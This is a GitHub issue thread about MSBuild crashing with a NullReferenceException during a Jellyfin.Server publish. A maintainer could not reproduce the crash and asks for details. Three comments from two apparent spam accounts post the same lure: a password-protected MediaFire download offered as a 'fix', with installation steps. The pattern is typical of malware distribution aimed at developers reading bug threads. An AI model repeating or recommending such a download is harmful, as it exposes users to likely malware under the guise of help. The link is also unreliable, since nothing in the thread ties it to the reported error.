### ISSUE TITLE
MSBUILD : error :     System.NullReferenceException: Object reference not set to an instance of an object

### ISSUE THREAD

**Issue by liuqinghongl** [dotnet/msbuild#10572]
### Issue Description

> [builder 4/4] RUN dotnet publish Jellyfin.Server --disable-parallel --configuration Release --output="/jellyfin" --self-contained --runtime linux-x64 -p:DebugSymbols=false -p:DebugType=none:                                                                                                                                                                           
13.43 MSBUILD : error : This is an unhandled exception in MSBuild -- PLEASE UPVOTE AN EXISTING ISSUE OR FILE A NEW ONE AT https://aka.ms/msbuild/unhandled [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                                                                                                                   
13.43 MSBUILD : error :     System.NullReferenceException: Object reference not set to an instance of an object. [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                       
13.43 MSBUILD : error :    at Regex1_Scan(RegexRunner, ReadOnlySpan`1) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                 
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.ScanInternal(RegexRunnerMode mode, Boolean reuseMatchObject, String input, Int32 beginning, RegexRunner runner, ReadOnlySpan`1 span, Boolean returnNullIfReuseMatchObject) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                                
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.RunAllMatchesWithCallback[TState](String inputString, ReadOnlySpan`1 inputSpan, Int32 startat, TState& state, MatchCallback`1 callback, RegexRunnerMode mode, Boolean reuseMatchObject) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                   
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.RunAllMatchesWithCallback[TState](String input, Int32 startat, TState& state, MatchCallback`1 callback, RegexRunnerMode mode, Boolean reuseMatchObject) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.Replace(MatchEvaluator evaluator, Regex regex, String input, Int32 count, Int32 startat) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Expander`2.MetadataExpander.ExpandMetadataLeaveEscaped(String expression, IMetadataTable metadata, ExpanderOptions options, IElementLocation elementLocation, LoggingContext loggingContext) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Expander`2.ExpandIntoStringLeaveEscaped(String expression, ExpanderOptions options, IElementLocation elementLocation) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.EvaluateItemDefinitionElement(ProjectItemDefinitionElement itemDefinitionElement) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.EvaluateItemDefinitionGroupElement(ProjectItemDefinitionGroupElement itemDefinitionGroupElement) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.Evaluate() [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.Evaluate(IEvaluatorData`4 data, Project project, ProjectRootElement root, ProjectLoadSettings loadSettings, Int32 maxNodeCount, PropertyDictionary`1 environmentProperties, ILoggingService loggingService, IItemFactory`2 itemFactory, IToolsetProvider toolsetProvider, IDirectoryCacheFactory directoryCacheFactory, ProjectRootElementCacheBase projectRootElementCache, BuildEventContext buildEventContext, ISdkResolverService sdkResolverService, Int32 submissionId, EvaluationContext evaluationContext, Boolean interactive) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Execution.ProjectInstance.Initialize(ProjectRootElement xml, IDictionary`2 globalProperties, String explicitToolsVersion, String explicitSubToolsetVersion, Int32 visualStudioVersionFromSolution, BuildParameters buildParameters, ILoggingService loggingService, BuildEventContext buildEventContext, ISdkResolverService sdkResolverService, Int32 submissionId, Nullable`1 projectLoadSettings, EvaluationContext evaluationContext, IDirectoryCacheFactory directoryCacheFactory) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Execution.ProjectInstance..ctor(String projectFile, IDictionary`2 globalProperties, String toolsVersion, BuildParameters buildParameters, ILoggingService loggingService, BuildEventContext buildEventContext, ISdkResolverService sdkResolverService, Int32 submissionId, Nullable`1 projectLoadSettings) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.BuildRequestConfiguration.<>c__DisplayClass61_0.<LoadProjectIntoConfiguration>b__0() [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.BuildRequestConfiguration.InitializeProject(BuildParameters buildParameters, Func`1 loadProjectFromFile) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.RequestBuilder.BuildProject() [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.RequestBuilder.RequestThreadProc(Boolean setThreadParameters) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]

### Steps to Reproduce

This is an unhandled exception in MSBuild -- PLEASE UPVOTE AN EXISTING ISSUE OR FILE A NEW ONE AT https://aka.ms/msbuild/unhandled [/repo/Jellyfin.Server/Jellyfin.Server.csproj]

### Actual Behavior

This is an unhandled exception in MSBuild -- PLEASE UPVOTE AN EXISTING ISSUE OR FILE A NEW ONE AT https://aka.ms/msbuild/unhandled [/repo/Jellyfin.Server/Jellyfin.Server.csproj]

### Analysis

no

### Versions & Configurations

10.9.x

**Comment by liuqinghongl** [comment]
13.43 MSBUILD : error : This is an unhandled exception in MSBuild -- PLEASE UPVOTE AN EXISTING ISSUE OR FILE A NEW ONE AT https://aka.ms/msbuild/unhandled [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                                                                                                                   
13.43 MSBUILD : error :     System.NullReferenceException: Object reference not set to an instance of an object. [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                       
13.43 MSBUILD : error :    at Regex1_Scan(RegexRunner, ReadOnlySpan`1) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                 
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.ScanInternal(RegexRunnerMode mode, Boolean reuseMatchObject, String input, Int32 beginning, RegexRunner runner, ReadOnlySpan`1 span, Boolean returnNullIfReuseMatchObject) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                                
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.RunAllMatchesWithCallback[TState](String inputString, ReadOnlySpan`1 inputSpan, Int32 startat, TState& state, MatchCallback`1 callback, RegexRunnerMode mode, Boolean reuseMatchObject) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]                                                                   
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.RunAllMatchesWithCallback[TState](String input, Int32 startat, TState& state, MatchCallback`1 callback, RegexRunnerMode mode, Boolean reuseMatchObject) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at System.Text.RegularExpressions.Regex.Replace(MatchEvaluator evaluator, Regex regex, String input, Int32 count, Int32 startat) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Expander`2.MetadataExpander.ExpandMetadataLeaveEscaped(String expression, IMetadataTable metadata, ExpanderOptions options, IElementLocation elementLocation, LoggingContext loggingContext) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Expander`2.ExpandIntoStringLeaveEscaped(String expression, ExpanderOptions options, IElementLocation elementLocation) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.EvaluateItemDefinitionElement(ProjectItemDefinitionElement itemDefinitionElement) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.EvaluateItemDefinitionGroupElement(ProjectItemDefinitionGroupElement itemDefinitionGroupElement) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.Evaluate() [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Evaluation.Evaluator`4.Evaluate(IEvaluatorData`4 data, Project project, ProjectRootElement root, ProjectLoadSettings loadSettings, Int32 maxNodeCount, PropertyDictionary`1 environmentProperties, ILoggingService loggingService, IItemFactory`2 itemFactory, IToolsetProvider toolsetProvider, IDirectoryCacheFactory directoryCacheFactory, ProjectRootElementCacheBase projectRootElementCache, BuildEventContext buildEventContext, ISdkResolverService sdkResolverService, Int32 submissionId, EvaluationContext evaluationContext, Boolean interactive) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Execution.ProjectInstance.Initialize(ProjectRootElement xml, IDictionary`2 globalProperties, String explicitToolsVersion, String explicitSubToolsetVersion, Int32 visualStudioVersionFromSolution, BuildParameters buildParameters, ILoggingService loggingService, BuildEventContext buildEventContext, ISdkResolverService sdkResolverService, Int32 submissionId, Nullable`1 projectLoadSettings, EvaluationContext evaluationContext, IDirectoryCacheFactory directoryCacheFactory) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.Execution.ProjectInstance..ctor(String projectFile, IDictionary`2 globalProperties, String toolsVersion, BuildParameters buildParameters, ILoggingService loggingService, BuildEventContext buildEventContext, ISdkResolverService sdkResolverService, Int32 submissionId, Nullable`1 projectLoadSettings) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.BuildRequestConfiguration.<>c__DisplayClass61_0.<LoadProjectIntoConfiguration>b__0() [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.BuildRequestConfiguration.InitializeProject(BuildParameters buildParameters, Func`1 loadProjectFromFile) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.RequestBuilder.BuildProject() [/repo/Jellyfin.Server/Jellyfin.Server.csproj]
13.43 MSBUILD : error :    at Microsoft.Build.BackEnd.RequestBuilder.RequestThreadProc(Boolean setThreadParameters) [/repo/Jellyfin.Server/Jellyfin.Server.csproj]

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by liuqinghongl** [comment]
RUN dotnet publish Jellyfin.Server --configuration Release --output="/jellyfin" --self-contained --runtime linux-arm64 -p:DebugSymbols=false -p:DebugType=none

**Comment by GangWang01** [comment]
@liuqinghongl from the provided info I guess Jellyfin.Server is in [Jellyfin](https://github.com/jellyfin/jellyfin) that guides how to [build from source](https://jellyfin.org/docs/general/installation/source/). The build happened on linux. I tried to reproduce this issue on linux using both non-container image and container image following the guide. Build succeeded. I couldn't reproduce this issue. The used dotnet version was 8.0.401.

If my guess is wrong, can you provide detailed info to help reproducing the issue including the following? 
- The source code or an example project to produce.
- Steps to reproduce.
- dotnet info - run the command `dotnet --info` to get
- OS: Linux, Windows or macOS.
